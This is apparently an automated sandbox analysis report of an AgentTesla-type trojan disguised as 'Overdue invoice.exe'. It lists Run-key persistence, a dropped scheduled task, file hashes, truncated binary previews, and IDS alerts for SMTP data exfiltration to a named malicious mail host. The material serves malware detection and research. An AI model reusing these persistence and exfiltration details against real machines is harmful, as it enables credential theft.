  Source: Overdue invoice.exe, 00000000.00000003.253356717.000000000591B000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
Contacted IPs:
IP: 206.183.111.188
  Domain: mail.jkudyog.com
  Country: United States
  ASN: 133296
  ASN Name: WEBWERKS-AS-IN WebWerksIndiaPvtLtdIN
  Malicious: true

Private IPs:
IP: 192.168.2.1
                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                  Analysis ID:635084
Start date and time: 27/05/2022 12:52:12 (2022-05-27 12:52:12 +02:00)
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 12m 52s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Sample file name:Overdue invoice.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:32
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.adwa.spyw.evad.winEXE@15/8@3/2
                                                  EGA Information:
                                                  • Successful, ratio: 80%
                                                  HDC Information:
                                                  • Successful, ratio: 0.3% (good quality ratio 0.2%)
                                                  • Quality average: 36.5%
                                                  • Quality standard deviation: 31.4%
                                                  HCA Information:
                                                  • Successful, ratio: 96%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 20.54.89.106, 52.152.110.14, 52.242.101.226, 20.223.24.244
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Execution Graph export aborted for target Overdue invoice.exe, PID 7124 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
Time      Type             Description
12:53:25  API Interceptor  703x Sleep call for process: Overdue invoice.exe modified
12:53:45  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run yqWDN C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
12:53:53  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run yqWDN C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
12:53:58  API Interceptor  456x Sleep call for process: yqWDN.exe modified
                                                  No context
                                                  Process:C:\Users\user\Desktop\Overdue invoice.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.355304211458859
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                  MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                  SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                  SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                  SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                  Process:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.355304211458859
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                  MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                  SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                  SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                  SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                  Process:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1645
                                                  Entropy (8bit):5.196427141159646
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBNixYtn:cbh47TlNQ//rydbz9I3YODOLNdq3SQ
                                                  MD5:364FC5EE0A5C3367CC852041FF7A5AF8
                                                  SHA1:2F039FE567DB11CEC74B020B1DC57E7BD20B8CC2
                                                  SHA-256:8037DD1DC6177AFE6038B4A78C79274F4DFFF4A96098ACE279B12517F607EEB8
                                                  SHA-512:AA980A773C0DC2E154EB1D060F3D90F05814E74BCE492C50DC2904D73724BC18ADF7677C127CEF0B98230856AEF47B42E39CE43293B7F7E28A77CEE9DD7980E4
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                  Process:C:\Users\user\Desktop\Overdue invoice.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1645
                                                  Entropy (8bit):5.196427141159646
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBNixYtn:cbh47TlNQ//rydbz9I3YODOLNdq3SQ
                                                  MD5:364FC5EE0A5C3367CC852041FF7A5AF8
                                                  SHA1:2F039FE567DB11CEC74B020B1DC57E7BD20B8CC2
                                                  SHA-256:8037DD1DC6177AFE6038B4A78C79274F4DFFF4A96098ACE279B12517F607EEB8
                                                  SHA-512:AA980A773C0DC2E154EB1D060F3D90F05814E74BCE492C50DC2904D73724BC18ADF7677C127CEF0B98230856AEF47B42E39CE43293B7F7E28A77CEE9DD7980E4
                                                  Malicious:true
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                  Process:C:\Users\user\Desktop\Overdue invoice.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):731648
                                                  Entropy (8bit):7.384642302436539
                                                  Encrypted:false
                                                  SSDEEP:12288:/52iNKUwVRh6UkRKstKDBi3x0Z5S2EetsSJhjsudQVYJUEKl75jQWmc:x18Ph6UkgstKFkYS270u2VYJUEKlCW
                                                  MD5:21C2F8CC3F1D71FFB036CA3788A346B6
                                                  SHA1:B1F681EB0C5B406BAD2414829D003568AB44982C
                                                  SHA-256:8E68AC628396CBB8619A54FFCE8AEDAE2A20CA23E514813B70C99987175F735D
                                                  SHA-512:4A6BE00ECBE056B5951926A87529A0993D5902841BB491460F8F6EAE1AAB017FF4EE2E8AF3C604AE0540C14B56751F517554AFC863918AB92362B3339A3CE406
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 60%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b.....................H........... ........@.. ....................................@.................................@...W........E...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....E.......F..................@..@.reloc.......`.......(..............@..B................|.......H.......P....R......B....y...1..........................................z.(".....}.....(#...o$...}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......*................n..}.....{....,..{....o....*..{....*.s%.
Process: C:\Users\user\Desktop\Overdue invoice.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 731648
Entropy (8bit): 7.384642302436539
Encrypted: false
SSDEEP: 12288:/52iNKUwVRh6UkRKstKDBi3x0Z5S2EetsSJhjsudQVYJUEKl75jQWmc:x18Ph6UkgstKFkYS270u2VYJUEKlCW
MD5: 21C2F8CC3F1D71FFB036CA3788A346B6
SHA1: B1F681EB0C5B406BAD2414829D003568AB44982C
SHA-256: 8E68AC628396CBB8619A54FFCE8AEDAE2A20CA23E514813B70C99987175F735D
SHA-512: 4A6BE00ECBE056B5951926A87529A0993D5902841BB491460F8F6EAE1AAB017FF4EE2E8AF3C604AE0540C14B56751F517554AFC863918AB92362B3339A3CE406
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 60%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b.....................H........... ........@.. ....................................@.................................@...W........E...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....E.......F..................@..@.reloc.......`.......(..............@..B................|.......H.......P....R......B....y...1..........................................z.(".....}.....(#...o$...}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......*................n..}.....{....,..{....o....*..{....*.s%.
Process: C:\Users\user\Desktop\Overdue invoice.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0
Process: C:\Users\user\Desktop\Overdue invoice.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 835
Entropy (8bit): 4.694294591169137
Encrypted: false
SSDEEP: 24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
MD5: 6EB47C1CF858E25486E42440074917F2
SHA1: 6A63F93A95E1AE831C393A97158C526A4FA0FAAE
SHA-256: 9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
SHA-512: 08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
Malicious: true
Preview: # Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.384642302436539
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: Overdue invoice.exe
File size: 731648
MD5: 21c2f8cc3f1d71ffb036ca3788a346b6
SHA1: b1f681eb0c5b406bad2414829d003568ab44982c
SHA256: 8e68ac628396cbb8619a54ffce8aedae2a20ca23e514813b70c99987175f735d
SHA512: 4a6be00ecbe056b5951926a87529a0993d5902841bb491460f8f6eae1aab017ff4ee2e8af3c604ae0540c14b56751f517554afc863918ab92362b3339a3ce406
SSDEEP: 12288:/52iNKUwVRh6UkRKstKDBi3x0Z5S2EetsSJhjsudQVYJUEKl75jQWmc:x18Ph6UkgstKFkYS270u2VYJUEKlCW
TLSH: 75F4CF20F71FB8D1D66EC6740BB686221EA14D7EFCF9921E5597314B0A31392601BCAF
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b.....................H........... ........@.. ....................................@................................
Icon Hash: 04fcf0b0d4a6e46c
Entrypoint: 0x47fe9a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x628EC311 [Thu May 26 00:00:17 2022 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7fe40 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x80000 | 0x345bc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb6000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x7dea0 | 0x7e000 | False | 0.818219866071 | data | 7.65168574947 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x80000 | 0x345bc | 0x34600 | False | 0.445009509248 | data | 6.26427887157 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb6000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x802b0 | 0xc5d8 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
RT_ICON | 0x8c888 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | |
RT_ICON | 0x9d0b0 | 0x94a8 | data | |
RT_ICON | 0xa6558 | 0x5488 | data | |
RT_ICON | 0xab9e0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295 | |
RT_ICON | 0xafc08 | 0x25a8 | data | |
RT_ICON | 0xb21b0 | 0x10a8 | data | |
RT_ICON | 0xb3258 | 0x988 | data | |
RT_ICON | 0xb3be0 | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_GROUP_ICON | 0xb4048 | 0x84 | data | |
RT_VERSION | 0xb40cc | 0x33c | data | |
RT_MANIFEST | 0xb4408 | 0x1b4 | XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators | |
DLL | Import
mscoree.dll | _CorExeMain
Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2015
Assembly Version | 1.0.0.0
InternalName | cCjl.exe
FileVersion | 1.0.0.0
CompanyName | FCSF
LegalTrademarks |
Comments |
ProductName | Event Transmission
ProductVersion | 1.0.0.0
FileDescription | Event Transmission
OriginalFilename | cCjl.exe
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/27/22-12:53:52.919110 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49715 | 587 | 192.168.2.3 | 206.183.111.188
05/27/22-12:53:52.919010 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49715 | 587 | 192.168.2.3 | 206.183.111.188
05/27/22-12:54:26.668198 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49745 | 587 | 192.168.2.3 | 206.183.111.188
05/27/22-12:53:52.919010 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49715 | 587 | 192.168.2.3 | 206.183.111.188
05/27/22-12:54:26.668311 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49745 | 587 | 192.168.2.3 | 206.183.111.188
05/27/22-12:54:26.668198 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49745 | 587 | 192.168.2.3 | 206.183.111.188
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 27, 2022 12:53:50.993177891 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:53:51.123843908 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:53:51.123989105 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:53:51.877722979 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:53:51.918479919 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:53:51.957850933 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:53:52.088825941 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:53:52.137103081 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:53:52.178985119 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:53:52.310087919 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:53:52.364459991 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:53:52.507563114 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:53:52.508352995 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:53:52.638927937 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:53:52.639225006 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:53:52.786659956 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:53:52.786880970 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:53:52.917552948 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:53:52.917664051 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:53:52.919009924 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:53:52.919110060 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:53:52.919651031 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:53:52.919720888 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:53:53.050086975 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:53:53.050416946 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:53:53.054867029 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:53:53.262171030 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:54:22.889226913 CEST | 49745 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:54:23.023149014 CEST | 587 | 49745 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:54:23.025516987 CEST | 49745 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:54:25.429943085 CEST | 587 | 49745 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:54:25.444358110 CEST | 49745 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:54:25.578612089 CEST | 587 | 49745 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:54:25.582864046 CEST | 49745 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:54:25.717389107 CEST | 587 | 49745 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:54:25.743762970 CEST | 49745 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:54:25.893343925 CEST | 587 | 49745 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:54:25.893627882 CEST | 49745 | 587 | 192.168.2.3 | 206.183.111.188
